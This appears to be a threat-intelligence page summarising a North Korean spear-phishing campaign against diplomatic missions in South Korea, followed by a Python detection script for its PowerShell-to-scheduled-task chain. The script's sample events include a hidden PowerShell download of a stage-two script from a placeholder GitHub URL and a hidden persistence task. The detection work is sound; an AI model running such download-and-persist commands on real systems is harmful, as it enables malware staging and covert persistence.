Kimsuky diplomatic spear-phishing campaign using GitHub and cloud storage
Campaign
Summary
A North Korean spear-phishing campaign targeted diplomatic missions in South Korea, using GitHub and cloud storage to deliver Xeno RAT and enable remote control of compromised systems. The operation ran from March to July 2025 and used at least 19 emails impersonating trusted diplomatic contacts. It matters because the chain combined official-looking lures, cloud-hosted payloads, and persistence tactics to support espionage.
Related Happenings
North Korean remote IT worker scam operation targeting American companies
Campaign
First: 16.04.2026 19:00
Last: 16.04.2026 19:00
Sources 1
About this happening:
A long-running **North Korean remote IT worker scam operation** used **stolen identities** and fake placements to embed operators inside **more than 100 American companies**. The...
Konni APT KakaoTalk spear-phishing campaign targeting Android users in South Korea
Campaign
First: 11.11.2025 13:40
Last: 11.11.2025 13:40
Sources 1
About this happening:
A **Konni APT** operation is using **spear-phishing** and **KakaoTalk** to compromise **Android users in South Korea**, enabling device compromise and malware spread. The multi-st...
UNK_SmudgedSerpent overlaps with TA453 TA455 and TA450 campaign expands across multiple victims
Campaign
First: 05.11.2025 18:00
Last: 05.11.2025 18:00
Sources 1
About this happening:
**UNK_SmudgedSerpent** is a **previously unknown** campaign that targeted **academics** and **foreign policy experts** focused on **Iran** and related policy issues between **June...
TransparentTribe BOSS Linux phishing espionage campaign
Campaign
First: 23.10.2025 18:30
Last: 23.10.2025 18:30
Sources 1
About this happening:
A **TransparentTribe / APT36** espionage campaign targeting **Indian government Linux systems** has been uncovered, showing an updated phishing operation built around **dedicated...
PhantomCaptcha spear-phishing campaign targeting Ukraine war relief organizations
Campaign
First: 22.10.2025 19:55
Last: 22.10.2025 19:55
Sources 1
About this happening:
**PhantomCaptcha** was a **single-day spear-phishing campaign** on **October 8, 2025** that targeted **Ukraine war relief groups** and **Ukrainian regional government administrati...
Timeline
- 20.08.2025 12:18 · 1 article
Trellix discloses diplomatic spear-phishing campaign
Initial Disclosure: Trellix disclosed a North Korean cyber espionage campaign targeting diplomatic missions in South Korea between March and July 2025, describing at least 19 spear-phishing emails that impersonated trusted diplomatic contacts and used password-protected ZIP files hosted on Dropbox, Google Drive, and Daum. The infection chain used a Windows shortcut (LNK) to launch PowerShell, reach GitHub for next-stage malware, establish persistence through scheduled tasks, and deliver Xeno RAT and MoonPeak. Trellix also assessed, based on timing and timezone analysis, that the operators may be operating from China or have Chinese alignment.
Sources:
- North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms — thehackernews.com — 20.08.2025 12:18
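The disclosed chain (Explorer opening an LNK, PowerShell fetching a second stage from GitHub, then a scheduled task for persistence) gives defenders a correlatable sequence in process-creation telemetry. The detection below is an added example written for this page, not Trellix's or the aggregator's own code; the event records, hostnames, task name and GitHub repository path are constructed placeholders, and the field names follow a Sysmon event 1 layout by assumption.

```python
import re
from collections import defaultdict

# Constructed process-creation records (Sysmon event 1 style). Hostnames,
# paths and the GitHub repository name are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    {"host": "ws-diplo-01", "ts": 100, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iwr https://raw.githubusercontent.com/EXAMPLE-REPO/stage2 -OutFile $env:TEMP\\s.ps1\""},
    {"host": "ws-diplo-01", "ts": 130, "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 15 /tn SysUpdate /tr \"powershell -w hidden -f %TEMP%\\s.ps1\" /f"},
    {"host": "ws-admin-02", "ts": 100, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Get-ChildItem C:\\Reports"},
    {"host": "ws-admin-02", "ts": 200, "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /query /tn Backup"},
]

GITHUB_RE = re.compile(r"(raw\.githubusercontent\.com|github\.com)", re.I)
HIDDEN_RE = re.compile(r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass)", re.I)

def is_stage1(ev):
    """An LNK lure is opened from Explorer, so the first hop is explorer.exe -> powershell.exe
    with a hidden window or bypassed execution policy and a GitHub URL on the command line."""
    return (ev["image"].lower() == "powershell.exe"
            and ev["parent"].lower() == "explorer.exe"
            and bool(HIDDEN_RE.search(ev["cmdline"]))
            and bool(GITHUB_RE.search(ev["cmdline"])))

def is_stage2(ev):
    """Persistence: schtasks /create spawned by PowerShell rather than by an admin's shell."""
    return (ev["image"].lower() == "schtasks.exe"
            and ev["parent"].lower() == "powershell.exe"
            and "/create" in ev["cmdline"].lower())

def detect_chain(events, window=600):
    """Return {host: verdict}: 'chain' when a GitHub-fetching PowerShell is followed within
    `window` seconds by a PowerShell-spawned scheduled task, 'fetch_only' for stage 1 alone."""
    stage1_times = defaultdict(list)
    verdicts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_stage1(ev):
            stage1_times[ev["host"]].append(ev["ts"])
            verdicts.setdefault(ev["host"], "fetch_only")
        elif is_stage2(ev) and any(0 <= ev["ts"] - t <= window for t in stage1_times[ev["host"]]):
            verdicts[ev["host"]] = "chain"
    return verdicts

if __name__ == "__main__":
    for host, verdict in detect_chain(SAMPLE_EVENTS).items():
        print(f"{host}: {verdict}")
```

Only the host with both stages in order is escalated to a full chain verdict; an administrator's interactive PowerShell and a schtasks query from cmd.exe produce nothing.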